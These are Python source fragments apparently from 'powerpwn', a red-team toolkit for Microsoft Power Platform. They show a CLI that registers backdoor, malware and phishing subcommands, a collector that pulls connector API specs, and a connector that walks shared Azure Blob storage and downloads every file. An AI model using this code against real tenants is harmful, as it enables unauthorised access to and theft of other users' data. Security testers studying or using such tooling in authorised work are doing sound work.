    parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.")
    command_subparsers = parser.add_subparsers(help="command", dest="command")

    module_dump(command_subparsers)
    module_gui(command_subparsers)
    module_backdoor(command_subparsers)
    module_nocodemalware(command_subparsers)
    module_phishing(command_subparsers)

    args = parser.parse_args()

    return args



import logging
from typing import Dict, Generator, List

import requests

from powerpwn.cli.const import LOGGER_NAME
from powerpwn.powerdump.collect.models.connector_entity import Connector
from powerpwn.powerdump.collect.resources_collectors._api import get_connector
from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType
from powerpwn.powerdump.collect.resources_collectors.iresource_collector import IResourceCollector
from powerpwn.powerdump.utils.const import SPEC_JWT_NAME

logger = logging.getLogger(LOGGER_NAME)


class ConnectorsCollector(IResourceCollector):
    def __init__(self, connector_id_to_connection_ids: Dict[str, List[str]]) -> None:
        self.__connector_id_to_connection_ids = connector_id_to_connection_ids

    def collect(self, session: requests.Session, environment_id: str) -> Generator[Connector, None, None]:
        for connector_id in self.__connector_id_to_connection_ids:
            logger.info(f"Fetching OpenAPI spec for connector {connector_id}.")

            try:
                connector = get_connector(session, environment_id=environment_id, connector_id=connector_id)
            except RuntimeError as e:
                if "403" in str(e):
                    logger.warning(f"User doesn't have access to custom connector spec for connector_id={connector_id}. Skipping spec.")
                    continue
                raise e

            swagger = connector["properties"]["swagger"]

            swagger["securityDefinitions"] = swagger.get("securityDefinitions", {})
            swagger["securityDefinitions"][SPEC_JWT_NAME] = {
                "name": "Authorization",
                "in": "header",
                "type": "apiKey",
                "description": "JWT Authorization header",
            }

            swagger["security"] = swagger.get("security", [])
            swagger["security"].append({"ApiHubBearerAuth": []})

            spec = Connector(
                api_name=connector_id,
                display_name=connector_id,
                environment_id=environment_id,
                created_at=connector["properties"]["createdTime"],
                last_modified_at=connector["properties"]["changedTime"],
                created_by=connector["properties"]["publisher"],
                version=connector["properties"]["swagger"]["info"]["version"],
                swagger=swagger,
                entity_id=connector_id,
                entity_type=ResourceType.connector,
                raw_json=connector,
            )

            yield spec

    def resource_type(self) -> ResourceType:
        return ResourceType.connector



import urllib.parse
from typing import Any, Dict, Generator, List

from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase
from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType
from powerpwn.powerdump.collect.models.data_dump_entity import DataDump
from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext
from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext
from powerpwn.powerdump.utils.const import ENCODING
from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify


class SharedAzureBlobConnector(ConnectorBase):
    def _ping(self, connection_parameters: dict) -> List[DataStore]:
        data_stores: List[DataStore] = []

        # we dont have server/database for another auth types
        if connection_parameters.get("name", "") != "keyBasedAuth":
            return data_stores

        success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection")

        storage_account_name = connection_parameters["values"]["accountName"]["value"]

        # if connection is connected with blob endpoint and not storage account
        if storage_account_name.startswith("https://"):
            storage_account_name = "AccountNameFromSettings"  # a hack # connection_parameters["values"]["accountName"]["value"].split(".blob.core.windows.net")[0].partition("https://")[2]

        if success:
            # TODO: with blob storage endpoint, we are getting Storage account name provided in the authentication 'https://exportdatasa.blob.core.windows.net' doesn't match with storage account name provided in the operation parameter
            can_list_root_folders, root_folders_val = consecutive_gets(
                session=self._session,
                expected_status_prefix="200",
                property_for_pagination="nextLink",
                url=f"{self._root}/v2/datasets/{storage_account_name}/foldersV2",
            )
            if can_list_root_folders:
                for root_folder in root_folders_val:
                    data_stores.append(
                        DataStore(
                            tenant=None,
                            scope=None,
                            account=storage_account_name,
                            name=root_folder["DisplayName"],
                            host=f'https://{storage_account_name}.blob.core.windows.net/{root_folder["Name"]}',
                            extra={"storage_account_name": storage_account_name, "blob_id": root_folder["Id"]},
                        )
                    )

        return data_stores

    def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]:
        data_records: List[DataRecord] = []
        folder_obj = {"Id": data_store.data_store.extra["blob_id"], "IsFolder": True}
        files = self.__enumerate_folders_content_recursively(data_store.data_store.extra["storage_account_name"], folder_obj)
        for file_obj in files:
            data_records.append(
                DataRecord(
                    record_type=DataDumpType.file,
                    record_id=file_obj["Id"],
                    record_name=file_obj["Name"],
                    extra={"file_path": file_obj["Path"], "media_type": file_obj["MediaType"]},
                )
            )

        return data_records

    def _dump(self, data_record: DataRecordWithContext) -> DataDump:
        file_id = urllib.parse.quote(data_record.data_record.record_id)

        success, _, val = request_and_verify(
            session=self._session,
            expected_status_prefix="200",
            is_json_resp=False,
            method="get",
            url=f"{self._root}/v2/datasets/{data_record.data_store.data_store.extra['storage_account_name']}/files/{file_id}/content",
        )

        if not success:
            raise ValueError(
                f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}."
            )

        document_value = val.encode(ENCODING)

        # add check for mypy
        if file_name := data_record.data_record.record_name:
            extension = file_name.split(".")[-1]

            last_index_for_extension = file_name.rindex(".")
            data_record.data_record.record_name = file_name[:last_index_for_extension]

        data_dump = DataDump(extension=extension, encoding=ENCODING, content=document_value)
        return data_dump

    def __enumerate_folders_content_recursively(self, storage_account: str, root_folder: Dict[str, str]) -> Generator[Dict[str, Any], None, None]:
        stack = [root_folder]
        while len(stack) > 0:
            current_folder_obj = stack.pop()
            if not current_folder_obj["IsFolder"]:
                yield current_folder_obj
            else:
                current_folder_obj_id = current_folder_obj["Id"]
                # TODO: use right pagination method with nextLink
                is_success, sub_folders = consecutive_gets(
                    session=self._session,
                    expected_status_prefix="200",
                    property_for_pagination="nextLink",
                    url=f"{self._root}/v2/datasets/{storage_account}/foldersV2/{current_folder_obj_id}",
                )
                if is_success and len(sub_folders) > 0:
                    stack.extend(sub_folders)

    @classmethod
    def api_name(cls) -> str:
        return "shared_azureblob"

    @classmethod
    def _apim_path(cls) -> str:
        return "azureblob"
